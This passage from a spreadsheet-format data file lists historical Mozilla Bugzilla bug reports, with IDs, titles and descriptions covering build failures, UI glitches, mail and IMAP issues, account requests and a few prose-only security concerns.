Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
Mozilla should start a website to encourage webmasters to design sites according
to standards so that they become cross platform and cross browser.
I have a lot stuff to post to this bug but very limited time.  I will add more
to it later today.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-465513</t>
  </si>
  <si>
    <t>Embedding fails to build for Gtk/X11 due to various minor typos</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.3) Gecko/2008092816 Iceweasel/3.0.3 (Debian-3.0.3-2)
Build Identifier: 
incubator/embedding does not build on x11/gtk environment 
Reproducible: Always
Steps to Reproduce:
1. fire compilation
2. observe your build tool output
Actual Results:  
compiles and builds flawlessly
not much according to chat in #embedding somebody just did a dir move. Anyway makefiles were never really tested</t>
  </si>
  <si>
    <t>andrey.petrov</t>
  </si>
  <si>
    <t>BUGZILLA-429577</t>
  </si>
  <si>
    <t>Add/Update info for Fedrushkov on the Developer Profiles</t>
  </si>
  <si>
    <t>Vitaly Fedrushkov
IRC Nick: SnowyOwl
Location: Chelyabinsk Russia
Day Job: Infosec and ITSM specialist LUKOIL oil company
Bugzilla Responsibilities: Localization (L10n) Lead Russian Localizer</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-359339</t>
  </si>
  <si>
    <t>messages marked as junk and moved to trash folder lose junk status (with IMAP server who doesn't support user-defined keywords)</t>
  </si>
  <si>
    <t>I am using the latest branch builds and the Zimbra IMAP server. When a message is marked junk and moved to the trash folder the junk indicator is lost. This makes finding and correcting junk false positives nearly impossible for me.</t>
  </si>
  <si>
    <t>BUGZILLA-180792</t>
  </si>
  <si>
    <t>setting and/or updating flags does not update last changed date</t>
  </si>
  <si>
    <t>The request tracker changes do no update the last changed date. They should. 
Steps to reproduce: file a bug. create an attachment. note the last changed
date. make a request for that attachment. note the last changed date.</t>
  </si>
  <si>
    <t>FIREFOX-300759</t>
  </si>
  <si>
    <t>Bad sorting when showing languages and special characters are used</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.8b3) Gecko/20050712 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.8b3) Gecko/20050712 Firefox/1.0+
When sorting languages alphabetically Firefox shows:
A
B
C
D
E
R
S
Ã
Ã‰
Expected results should be:
A
Ã
B
C
D
E
Ã‰
R
S
I am attaching a screenshot that demonstrates the bug.
Reproducible: Always
Steps to Reproduce:
An example of this behaviour (because I suppose it is a bug in a general purpose
sorting routine) can be found here: Tools menu -&gt; Advanced tab -&gt; General
tab -&gt; Languages frame Edit languages button Select a language to add combo.</t>
  </si>
  <si>
    <t>FIREFOX-266511</t>
  </si>
  <si>
    <t>Import Wizard doesn't show what items were imported</t>
  </si>
  <si>
    <t>The Import Wizard that appears when starting Firefox for the first time doesn't
display what items (bookmarks cookies browsing history etc.) are being
imported (2nd screen of wizard) nor does it display the items that were
successfully imported (3rd screen of wizard).
This seems to have regressed between the 2004-10-05 and the 2004-10-14 branch
builds.</t>
  </si>
  <si>
    <t>THUNDERBIRD-468335</t>
  </si>
  <si>
    <t>AddFileAttachment and AddUrlAttachment functions</t>
  </si>
  <si>
    <t>Created attachment 351785
proposed fix
Follow up to bug 331387 comment 9.
Create AddFileAttachment and AddUrlAttachment functions... and some minor cleanup.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-511634</t>
  </si>
  <si>
    <t>Localization Server</t>
  </si>
  <si>
    <t>Time is incorrect on localization server</t>
  </si>
  <si>
    <t>I noticed that the time on the localization server is not correctly set:
At 16h20 the server is giving a time 20 minutes in advance
pascalc@l10n:~$ date
Thu Aug 20 16:40:33 CEST 2009
(This is not very important for me but could be more annoying for others maybe)</t>
  </si>
  <si>
    <t>MINIMO_GRAVEYARD-299734</t>
  </si>
  <si>
    <t>make xpcom typelib tools build on wince</t>
  </si>
  <si>
    <t>CORE-320476</t>
  </si>
  <si>
    <t>Canvas doesn't respond to dynamically changing width/height attribute values</t>
  </si>
  <si>
    <t>See upcoming testcase. The width nor the height of the canvas changes when changing the width or height attribute of the canvas dynamically.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-408765</t>
  </si>
  <si>
    <t>set up bonsai for Mozilla1.8-Staging Tinderbox tree</t>
  </si>
  <si>
    <t>I've created a new tree Mozilla1.8-Staging but I can't set up bonsai as it requires a username/password for the database.
I believe that I entered things correctly during setup of the tree if there is any doubt please set it to be just like Mozilla1.8 tree.</t>
  </si>
  <si>
    <t>CORE-443039</t>
  </si>
  <si>
    <t>JSOP_ITER and related cleanups from bug 417131 patch</t>
  </si>
  <si>
    <t>Created attachment 327690
patch
I'd like to get rid of JSOP_FOREACH and JSOP_FOREACHKEYVAL and land a renaming cleanup (JSNativeEnumerator instead of JSNativeIteratorState) from bug 417131. Hoping to get fast review for this.
/be</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-381553</t>
  </si>
  <si>
    <t>Address-Field in MailNews Compose Window not working properly</t>
  </si>
  <si>
    <t>Created attachment 265650
Screenshot from Address-Window
After yesterdays checkin for Bug 380872 and Bug 53901 the Adress-Fild in MailNews Compose-Window was cut off at right. Asrail has described this before in https://bugzilla.mozilla.org/show_bug.cgi?id=380913#c17 
Screenshot coming up soon. 
So this issue might be an Duplicate to Bug 380913 but I prefer to file a new one for a new issue.</t>
  </si>
  <si>
    <t>CORE-314459</t>
  </si>
  <si>
    <t xml:space="preserve"> () should be a stretchy MathML character</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-156998</t>
  </si>
  <si>
    <t>TOP command may not be supported by POP3 server</t>
  </si>
  <si>
    <t>My employer runs his own homebrewed POP3 server which implements the absolute
bare minimum allowed by the POP3 RFC spec.
Mozilla [1.0 RC3 for Windows Build ID: 2002052306] is able to connect to it and
log in but then it attempts a command (TOP I believe) that is unimplemented
in this POP3 server.
The server reports the error as it is supposed to (with ERR- unrecognized
command or something like that).  Mozilla then drops the connection and acts
from the user's point of view as if it succeeded and found no mail -- even
though the POP3 server had reported 5 waiting messages to it before the
connection was dropped.
At the very least Mozilla should report that an error occurred when downloading
the messages.
Better would be for it to have a fallback method that does not use the TOP
command for those few (or one) POP3 servers out there that don't support it.
I might be able to arrange to set up a POP account on the server in question for
testing.</t>
  </si>
  <si>
    <t>cdurst</t>
  </si>
  <si>
    <t>SEAMONKEY-138018</t>
  </si>
  <si>
    <t>IMAP Shared UI: Should greyout/disable delete button Personal Folders of Move Message menu delete folder &amp; compact folder for read privilege folders</t>
  </si>
  <si>
    <t>Used 04-15-14-1.0.0
Should greyout/disable delete button delete folder &amp; compact folder for 
msgs of read privilege folders
1) Login to an IMAP with Shared Read Privilege Folders account
2) Select the messages of those Read Privilege Folders on the thread pane.
Actual Results: Delete button delete folder &amp; compact folder are all enable 
select delete &amp; delete folder will get a permission denied alert. Select 
compact folder will no action.
Expected results: Should greyout/disable delete button delete folder &amp; compact 
folder from our client so users won't see those alerts from the IMAP server.</t>
  </si>
  <si>
    <t>CORE-208898</t>
  </si>
  <si>
    <t>In-process accessibility clients need XPCOM notification of newly initiialized doc views</t>
  </si>
  <si>
    <t>The closest way I can find to start the accessibility tree building process is
to use nsIWebProgressListner and wait for a StateChange of STATE_TRANSFERRING.
However 1) it's not a frozen interface and 2) it's a lot of code to listen for
just that.</t>
  </si>
  <si>
    <t>CALENDAR-149290</t>
  </si>
  <si>
    <t>Time picker should be 24 hours</t>
  </si>
  <si>
    <t>There was a bug about this some weeks ago but I guess it was lost when somebody
rewrote the timepicker. Using Win2k Mozilla RC3 Cal2002060416
Problem: While AM/PM / 24h system is correctly used everywhere else you still
have to choose the date of your events in the AM/PM system.
My request: There should be a 24 hours picker for users who use the 24 hours system.</t>
  </si>
  <si>
    <t>BUGZILLA-184256</t>
  </si>
  <si>
    <t>Canedit group_control_map entry does not prevent making attachments</t>
  </si>
  <si>
    <t>A user who is not supposed to be able to comment on or change a bug in a
particular product because of the canedit group_control_map entry can still
create (and probably change) attachments.
While they can only add information but they are not supposed to be able to do so.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-489119</t>
  </si>
  <si>
    <t xml:space="preserve">Hg Account Request - David Bolter </t>
  </si>
  <si>
    <t>Request for hg access on mozilla-central.</t>
  </si>
  <si>
    <t>NSS-164035</t>
  </si>
  <si>
    <t>Small code optimization in file certdb.c</t>
  </si>
  <si>
    <t>In file certdb.c line #1347 the length is retrieved
from the expression 'current-&gt;name.other.len' where
it is possible to use the local variable 'cnLen' just
as it is shown in this pseudo patch:
-                 PORT_Memcpy(cn current-&gt;name.other.data 
-                                 current-&gt;name.other.len)
+                 PORT_Memcpy(cn current-&gt;name.other.data 
+                                 cnLen)</t>
  </si>
  <si>
    <t>TOOLKIT-388048</t>
  </si>
  <si>
    <t>mozIStorageStatement::getParameterIndexes is useless</t>
  </si>
  <si>
    <t>Created attachment 272192
proof
It returns an array in case it was used more than once but sqlite magically takes care of that for us.  It should be renamed to getParameterIndex and return an int.
Attached is a testcase demonstrating that sqlite does in fact handle this gracefully.</t>
  </si>
  <si>
    <t>SEAMONKEY-136687</t>
  </si>
  <si>
    <t>quick search only appears when entering new text not when editing existing</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:0.9.9) Gecko/20020311
BuildID:    2002031104
When changing the text in a quick search the Search Google for does not come up.
Reproducible: Always
Steps to Reproduce:
1. Type in 'www bob com' to the quick search
2. use left arrow move to letter c
3. change letter c to b
4. quick search does not pop ip.
Actual Results:  the search google for does not pop up.
Expected Results:  search google for to pop up.</t>
  </si>
  <si>
    <t>location-bar</t>
  </si>
  <si>
    <t>dg20</t>
  </si>
  <si>
    <t>NSPR-17374</t>
  </si>
  <si>
    <t>Types for offset are added to NSPR</t>
  </si>
  <si>
    <t>Types for offset similar to unix off_t and loff_t are added to NSPR.
Functions using offset types are changed to use those types instead of PRInt32
or PRInt64.</t>
  </si>
  <si>
    <t>srinivas</t>
  </si>
  <si>
    <t>larryh</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-505033</t>
  </si>
  <si>
    <t>Only show close button when in fullscreen mode</t>
  </si>
  <si>
    <t>When we're not full screen they OS is providing this functionality.</t>
  </si>
  <si>
    <t>NSS-90239</t>
  </si>
  <si>
    <t>tools tests do not test right signtool functionallity</t>
  </si>
  <si>
    <t>In the place where signtool should be Listing signed files in the jar signtool
is called with -w (Show who signed the jar file) which is a test that is being
done later anyway.
I assume it should be 
signtool -v x.jar -d ../alice -p nss -k objsigner
Ian could you please verify this?</t>
  </si>
  <si>
    <t>BUGZILLA-304417</t>
  </si>
  <si>
    <t>Template precompilation is clumsy when it comes to additional language directories</t>
  </si>
  <si>
    <t>The precompilation code correctly rounds up all .tmpl files and then compiles
each like a browser giving no Accept-Language header would.
-&gt; Only en templates end up being precompiled in data/template/template
-&gt; Other language directories custom directories and extension directories
   each cause precompilations with no net effect:
   en/custom/index.html.tmpl is compiled for en/default/index.html.tmpl
   xx/default/index.html.tmpl xx/custom/index.html.tmpl and of course
   en/custom/index.html.tmpl
-&gt; Localized template packs may not introduce additional language-specific
   templates:
   if they try to precompilation errors out saying file error -
   somewhere/whatever.html.tmpl: not found because the template is being
   looked for in template/en only.
Suggested solution:
Template precompilation should precompile each language directory separately.
For each language directory in turn it should
 - make a list of all .tmpl files in there
 - remove duplicates between default custom and extension from the list
 - set $ENV{'HTTP_ACCEPT_LANGUAGE'} to the name of the language directory
 - perform precompilation for each .tmpl file left on the list</t>
  </si>
  <si>
    <t>jochen.wiedmann</t>
  </si>
  <si>
    <t>BUGZILLA-365259</t>
  </si>
  <si>
    <t>The Product select menu in request.cgi doesn't group products by classifications</t>
  </si>
  <si>
    <t>It should behave the same way as query.cgi?format=specific i.e. use  for each new classification.</t>
  </si>
  <si>
    <t>CORE-340107</t>
  </si>
  <si>
    <t>UniversalBrowserRead should not permit access to chrome documents</t>
  </si>
  <si>
    <t>By the nature of the UniversalBrowserRead privilege scripts with
this privilege enabled can access any document in anywhere and
be able to take control of the user's activity on the web site
(by reading login cookies -- the sentisive browser data).
The problem is anywhere mentioned in the above includes the chrome.
Once the script with UBR enabled have access to a chrome JavaScript
object it can do more than to read sensitive browser data by
elevating its privilege to full chrome level (see bug 313684).</t>
  </si>
  <si>
    <t>sync2d</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-337550</t>
  </si>
  <si>
    <t>Network connection dies after browser has been idle</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.9a1) Gecko/20060510 Camino/1.2+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en rv:1.9a1) Gecko/20060510 Camino/1.2+
With the most recent Trunk builds - using 2006051020 (1.2+) - the browser fails to connect to websites after it has been idle for a moment. It shows 'loading' in the statusbar but the site is never loaded.
Other symptoms observed: clicking on a link does nothing anymore.
This has happened in two ways:
load page then go reading your email  back to browser and it is dead
load page let it sit there while I was looking at another browser on another computer.
First noticed with my own build (checkout start: Thu May 11 08:33:57 JST 2006) and now with the  2006051020 (1.2+) 'Maya' build.
Suspicion is on bug 326273.
Camino atm can't check with Firefox - the equivalent FX tinderbox builds simply crash at start-up (bug 337481).
My network connection is alright as I can connect with other browsers.
Reproducible: Always</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-437279</t>
  </si>
  <si>
    <t>Dictionaries updates need to respect Firefox version</t>
  </si>
  <si>
    <t>See bug 411809 comment 20. We need VersionCheck to examine the Firefox version when checking for dictionary updates.</t>
  </si>
  <si>
    <t>bhashem</t>
  </si>
  <si>
    <t>CORE-213103</t>
  </si>
  <si>
    <t>Events should go to capturing views even when clip rect is empty [Patch included]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030516 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5b) Gecko/20030716
Tree type splitters don't work inside of a scrolled view. After researching the
problem I found the issues to be in nsViewManager where events aren't in some
cases delivered to views that have an empty clip rect even when that view is
capturing.
Included is a patch. I need this fixed before I can complete bug #212789
Reproducible: Always
Steps to Reproduce:
1. Open XUL attachment
2. Note how tree splitters on top bar work fine but splitters 
   inside the scrolled view cause a mess.
Actual Results:  
Splitters in top set of tree columns work bottom set doesn't.
Expected Results:  
Behavior should be identical in the two cases as all that's present is an
additional view (overflow: -moz-scrollbars-borizontal)</t>
  </si>
  <si>
    <t>CORE-121260</t>
  </si>
  <si>
    <t>gtk2 needs to have sound hooked up</t>
  </si>
  <si>
    <t>gtk2 need to have the sound interface hooked up.</t>
  </si>
  <si>
    <t>CORE-215250</t>
  </si>
  <si>
    <t>crash in nsTimerImpl::InitWithCallback</t>
  </si>
  <si>
    <t>Going to http://www.bilnorge.no now causes a crash.
May be related to checkin for bug 215163 see stack attached in attachment 129277</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-527219</t>
  </si>
  <si>
    <t>dehydra with gcc 4.5 does not add class methods to .members</t>
  </si>
  <si>
    <t>test_isExtern.js and test_hasDefault.js both fail with Member * not found Exceptions.
Digging deeper it seems like methods are not correctly added to the members array.
isExtern only has the int member listed hasDefault does not list any members because the class does only contain methods and no data-members.</t>
  </si>
  <si>
    <t>arpad.borsos</t>
  </si>
  <si>
    <t>CORE-36750</t>
  </si>
  <si>
    <t>Fix nsThreadPool to minimize threads</t>
  </si>
  <si>
    <t>At the last minute I had to comment out the code to allow threads to terminate 
from the thread pool code because they still hung around waiting to be joined 
with. This effectively leaked them.
Here's a message from Wan-Teh about how we could possibly fix this:
Subject: 
             Re: clearing PR_JOINABLE_THREAD
       Date: 
             Fri 21 Apr 2000 09:05:53 -0700
       From: 
             wtc@netscape.com (Wan-Teh Chang)
          To: 
             Warren Harris 
         CC: 
             Doug Turner 
 References: 
             1
Warren Harris wrote:
&gt; 
&gt; Hi Wan-Teh
&gt; 
&gt; I've got a problem with nsThread.cpp that I'm hoping you can help me
&gt; solve. Doug and I have changed the implementation of nsThreadPool to
&gt; do a little better job managing the threads in the pool letting the
&gt; count of threads grow up to a max and shrink back down to a minimum
&gt; number when not needed.
That's good!
&gt; However the problem comes in because I've
&gt; made the threads be joinable so that we can synchronize with them when
&gt; the thread pool gets destroyed. However for the threads that
&gt; terminate themselves (because they're no longer needed) there's no
&gt; way that I can tell to clear the joinable bit. This causes them to not
&gt; actually go away but hang out waiting to be joined with even though
&gt; the thread pool has now forgotten about them. Is there some way to
&gt; clear the joinable bit?
No.  Once an NSPR thread is create joinable or unjoinable
there is no way to change that attribute.  I'm not sure
whether that's an oversight or a conscious design decision.
Pthreads has the operation you want: pthread_detach.
It's not hard to work around this limitation.  You'd create
all your threads PR_UNJOINABLE_THREAD.  Then you use a
thread count and a condition variable to synchronize with
them when the thread pool gets destroyed like this:
void WorkerThread(void *arg)
{
    ....
    // need to exit either voluntarily or because the
    // thread pool is being destroyed.
    PR_Lock(thread_pool_lock)
    if (--thread_count == 0) {
        PR_NotifyCondVar(all_threads_exited_cv)
    }
    PR_Unlock(thread_pool_lock)
}
void TheThreadThatDestroysTheThreadPool(void *arg)
{
    ...
    // signals all the threads in the pool to exit
    ...
    // synchronize with them
    PR_Lock(thread_pool_lock)  // you might already be holding this
lock when you signal the threads to exit
    while (thread_count) {
        PR_WaitCondVar(all_threads_exited_cv PR_INTERVAL_NO_TIMEOUT)
    }
    PR_Unlock(thread_pool_lock)
    ....
}
I will take a look at your new thread pool code tonight.
Wan-Teh
Maybe Doug would be good enough to take this task on again and help me solve 
this problem. 
(BTW Doug If you look for the #if 0 in nsThread.cpp you'll see how I was 
attempting to let threads go away. I don't think there was any need for the 
initial Wait with timeout that you had before -- if there are too many 
already just let them go.)</t>
  </si>
  <si>
    <t>CALENDAR-227193</t>
  </si>
  <si>
    <t>Sample General comp. summary</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 5.0 Windows 98 DigExt)
Build Identifier: Sample Calender Gen
Other details sample for gen
Reproducible: Always
Steps to Reproduce:
1.Ok
2.
3.</t>
  </si>
  <si>
    <t>usbadve</t>
  </si>
  <si>
    <t>CORE-234593</t>
  </si>
  <si>
    <t>Growing table</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7a) Gecko/20040212 Firebird/0.8.0+
Go to the URL and mouse over the Document Literal link that is next to the
text Wiki:.  The center cell on the page grows larger and larger to the right
as you mouse over the link.
Reproducible: Always
Steps to Reproduce:
See details.
Actual Results:  
See details.
Expected Results:  
The size of the center cell should remain constant.</t>
  </si>
  <si>
    <t>terris</t>
  </si>
  <si>
    <t>MOZILLA.ORG-385842</t>
  </si>
  <si>
    <t>Create LDAP account for Zbigniew Braniecki and give him SVN access</t>
  </si>
  <si>
    <t>Create SVN account for :
Name: Zbigniew Braniecki
email: zbraniecki@aviary.pl
SSH key: bug #281419
This user will need subversion privs set for :
projects/mozilla-europe.org/trunk/pl/.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-464468</t>
  </si>
  <si>
    <t>et / Estonian</t>
  </si>
  <si>
    <t>[et] The Getting Started page for Estonian</t>
  </si>
  <si>
    <t>A new Firefox profile includes a link to the Getting started page on the Bookmarks toolbar. The objective of this page is to provide the users with a few task-based starting points. They could use them to enjoy the web and discover sites that will help them get the most out of Firefox and the Internet in general. This page will be aimed towards beginning and intermediate Web users. We want to promote community/user oriented collaborative sites with good user experience in your region and language and good standards support.
The current en-US defaults for this page are:
 The 'Work' category: Google Docs Remember the Milk LinkedIn Clipmarks Add-on
 The 'Learn' category: Wikipedia Topix HowStuffWorks.com Answers Add-on
 The 'Play' category: YouTube Hype Machine Miro PicLens Add-on
 The 'Connect' category: Criagslist Yelp Facebook Me.dium Add-on 
(See the en-US page at http://www.mozilla.com/en-US/firefox/central/.)
We would like to provide a good set of links on this page for our Estonian users.
First the localization team and Stas (Stas Malolepszy) will look at the market for your language and come up with a good candidates. Sander we'll need your input on this of course. The guidelines for making recommendations are on https://wiki.mozilla.org/Firefox_web_services_guidelines.
Second once we have a good list of candidates your localization team will localize the 'Getting Started' index.html file which can be found here: http://viewvc.svn.mozilla.org/vc/projects/mozilla.com/trunk/en-US/firefox/central/index.html?revision=18714&amp;content-type=text%2Fplain changing the en-US default as agreed in the first step.
The logos should be named sites-.png and should be 110px wide and 65px high on white or transparent background. Stas can help on getting the logos from the website owners.
The localized index.html and the logos should be then attached in a ZIP archive to this bug and a review should be requested from Stas (stas@mozilla.com) and Pascal (pascalc@gmail.com). Once the review have been granted Pascal will take over to push the localized page on the server.
Thank you.</t>
  </si>
  <si>
    <t>BUGZILLA-127200</t>
  </si>
  <si>
    <t>Query for CC/longdesc/OR takes long time</t>
  </si>
  <si>
    <t>Reproduction:
1. Go to Bugzilla page
2. Go to query page
3. Uncheck entries under Status
4. Enter jens@unfaehig.de under e-mail adress exact match matching field CC
5. Run query
The query takes a long time (such a long time that I haven't waited for it to
finish aborted it after some minutes).
Maybe no index in the database for that field?</t>
  </si>
  <si>
    <t>blog</t>
  </si>
  <si>
    <t>CORE-517658</t>
  </si>
  <si>
    <t>When adding MozOrientation listener the listener is called only after there is orientation change</t>
  </si>
  <si>
    <t>I think this is a regression. We don't get the event somewhat soon after
adding the listener. And we should so that web app can know the current
orientation.
At least on mac I need to wait several seconds before I get the first event (if I don't move the laptop).</t>
  </si>
  <si>
    <t>CALENDAR-332270</t>
  </si>
  <si>
    <t>JavaScript strict warning: assignment to undeclared variable viewElem</t>
  </si>
  <si>
    <t>Warning: assignment to undeclared variable viewElem
Source File: chrome://calendar/content/calendar-decorated-month-view.xml
Line: 61
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20060329 Mozilla Sunbird/0.3a1+</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-529018</t>
  </si>
  <si>
    <t>[ku] 3.6 whatsnew/firstrun localization</t>
  </si>
  <si>
    <t>FIREFOX-271097</t>
  </si>
  <si>
    <t>searchplugin auto update should ask user</t>
  </si>
  <si>
    <t>Currently searchplugins automatically update without getting a confirmation for
that download and install from the user.
This raises some privacy concerns as the updated searchplugin could send user
data to a different server which could gather userdata that way.
There are at least two ways to do this.
One would be by adding a third line to
Extras - Preferences - Extended - Software Update
like
[ ] searchplugins
and check that pref before updating.
The next one would be to pop up a dialog or a toolbar or something if a 
update is available and ask a do you want to do now not [] don't ask again
standard UI dialog.</t>
  </si>
  <si>
    <t>CORE-354785</t>
  </si>
  <si>
    <t>Consolidate the handling of &amp;minus</t>
  </si>
  <si>
    <t>Three closely related issues that I would like to address in this bug:
1- It may happen that - and  are handled with different fonts because ironically - is internally substituted to a  and receives a special treatment while a starting  is left to its own devices so to speak. It should go through the same codepath of a substituted 
2- The pref for changing the fonts associated to individual characters is e.g.
pref(font.mathfont-family.\\u2264.base CMSY10)
However users tend to use
pref(font.mathfont-family.\u2264.base CMSY10)
By convention any \uNNNN is actually converted to a Unicode point by JavaScript. But clueless users (who are not savvy of JavaScript) are left baffled as to why their pref setting isn't working. I think I will just make both settings to work internally.
(It should be recalled that the same setting in the mathfont.properties file is:
font.mathfont-family.\u2264.base     = CMSY10
but here the key is treated as ascii and so \u2264 really means \u2264 ascii character by ascii character.)
3. It was brought to my attention (bug 120198 comment 102) that the default setting for  may be better off extended using perhaps:
font.mathfont-family.\u2212.base    = Symbol Courier New Courier Times</t>
  </si>
  <si>
    <t>CORE-287699</t>
  </si>
  <si>
    <t>crash when mozilla tries to render an svg (with cairo backend)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.8b2) Gecko/20050325
Build Identifier: Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.8b2) Gecko/20050325
Trying to view any SVG with the cairo backend will CRASH mozilla on Solaris.
error report (numbers were different btw):
X Error of failed request:  BadMatch (invalid parameter attributes)
  Major opcode of failed request:  72 (X_PutImage)
  Serial number of failed request:  32
  Current serial number in output stream:  39
After some googling I found this: 
http://lists.freedesktop.org/archives/cairo/2004-January/000956.html
I changed cairo_xlib_surface.c to say 
  image-&gt;depth == 32 ? 24 : image-&gt;depth
instead of 
  image-&gt;depth
And this solved the crashing. I'm not creating a patch because everything that's
supposed to be red is now green here (and the other way around)... :). These
colors can probably be fixed by doing a bitshift but I'm really uncertain about
where to do this and IF this is the right way to proceed.
This issue is a CAIRO vs (24 bpp) XFree issue so it should ideally be solved by
the cairo team...
Another related link:
http://lists.ximian.com/archives/public/mono-devel-list/2004-May/005998.html
Reproducible: Always</t>
  </si>
  <si>
    <t>Egon.Nijns</t>
  </si>
  <si>
    <t>THUNDERBIRD-408338</t>
  </si>
  <si>
    <t>Thunderbird should have session restore</t>
  </si>
  <si>
    <t>There's not a lot of state that gets lost when you restart Thunderbird but there's a few things that would be nice to preserve across a restart:
1) scroll positions within mailboxes
2) unseen message indicators on folders (as opposed to unread). In current incarnations of Thunderbird this is the blue highlight on a folder. It gets lost when you restart Thunderbird whether you actually looked at the mailbox or not.
3) which mailbox you currently had open
4) any compose windows you might have had open at the time
5) message windows that were open for reading</t>
  </si>
  <si>
    <t>wei0</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-420707</t>
  </si>
  <si>
    <t>Remove MOZ_META_COMPONENT ifdef from config.mk</t>
  </si>
  <si>
    <t>The ifdef check for MOZ_META_COMPONENT under http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/config/config.mk&amp;rev=3.387#288 should be removed as MOZ_META_COMPONENT is no longer defined anywhere. Also see http://mxr.mozilla.org/mozilla/search?string=MOZ_META_COMPONENT on this.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-342489</t>
  </si>
  <si>
    <t>[FIX]Security check in InstallTriggerCheckLoadURIFromScript is odd</t>
  </si>
  <si>
    <t>Why bother with URIs?</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-439792</t>
  </si>
  <si>
    <t>website needs download warning for users on de-supported o.s.</t>
  </si>
  <si>
    <t>We need some sort of compat warning for 10.3 users its becoming a user issue with SUMO...</t>
  </si>
  <si>
    <t>CORE-320092</t>
  </si>
  <si>
    <t>designmode=on fails for application/xhtml+xml documents</t>
  </si>
  <si>
    <t>Setting designMode to on fails for documents served as application/xhtml+xml.
Attachments to follow.</t>
  </si>
  <si>
    <t>CORE-176919</t>
  </si>
  <si>
    <t>support for async input/output streams</t>
  </si>
  <si>
    <t>with the current mozilla architecture data is pushed from the transport layer
through the protocols up to the consumers.  each layer must process all the
data pushed to it (via OnDataAvailable).  this requirement often complicates
stream listener implementations (e.g. additional buffering).
instead consumers should be able to ask to be notified when an input stream
(or output stream) becomes ready ... by ready i mean either closed
readable or writable.  then consumers could be in complete control of the data
flow.
i think a lot of networking code could be simplified if the streams could tell a
consumer when they are ready.
i've put together a prototype implementation of nsPipe that provides these
interfaces:
  nsIAsyncInputStream : nsIInputStream
  {
    void asyncWait(in nsIInputStreamListener listener)
  }
  nsIAsyncOutputStream : nsIOutputStream
  {
    void asyncWait(in nsIOutputStreamListener listener)
  }
the listener interfaces are:
  nsIInputStreamListener : nsISupports
  {
    void onInputStreamReady(in nsIAsyncInputStream stream)
  }
  nsIOutputStreamListener : nsISupports
  {
    void onOutputStreamReady(in nsIAsyncOutputStream stream)
  }
there are a lot of details to work out and the patch i'm about to submit is
only a prototype.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-332091</t>
  </si>
  <si>
    <t>Possibility to add special part to package names</t>
  </si>
  <si>
    <t>The current convention followed by our package file names (implemented via package-name.mk) says the following: http://developer.mozilla.org/en/docs/Package_Filename_Convention#Platform_.5B-special.5D
-------
Special is used to distinguish non-default characteristics of the build:
   1. GTK2 is the default toolkit on linux platforms. If a GTK binary is built -gtk1 is appended to the platform
   2. for distiction to other builds other non-default build options should be specified there in short but meaningful identifiers e.g. builds including a patch for the MNG image format should specify -mng or windows builds compiled with gcc instead of MSVC may specify -gcc here.
-------
We're doing that for -gtk1 automatically but one should be able to easily add in a special identifier easily - our usual way for such things is to use env vars.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-310631</t>
  </si>
  <si>
    <t>Install script should not do maintenance tasks</t>
  </si>
  <si>
    <t>install.php performs maintenance tasks for statistics that should be instead
pushed out to another separate script(s) called by cron instead.  By separating
these tasks we could eliminate a lot of queries that don't need to happen
_everytime_ someone downloads an addon.  This would dramatically lighten the
load on osdb01 and osdb02 and increase the overall performance of the entire
addons site as a result.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-267811</t>
  </si>
  <si>
    <t>FIREFOX_1_0_RC2_RELEASE and THUNDERBIRD_0_9_RELEASE use AVIARY branch in their client.mk files</t>
  </si>
  <si>
    <t>FIREFOX_1_0_RC2_RELEASE and THUNDERBIRD_0_9_RELEASE's client.mk's are both set
to use AVIARY_1_0_20040515_BRANCH to checkout from instead of the respective
release tags.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-417727</t>
  </si>
  <si>
    <t>Ignore application compatibility info for search engines</t>
  </si>
  <si>
    <t>There new listing pages for search engines currently turn up empty.
The reason is that none of them have application compatibility info so they'll be figured incompatible with the currently chosen app. We should run some SQL in order to make them compatible with the usual suspects.
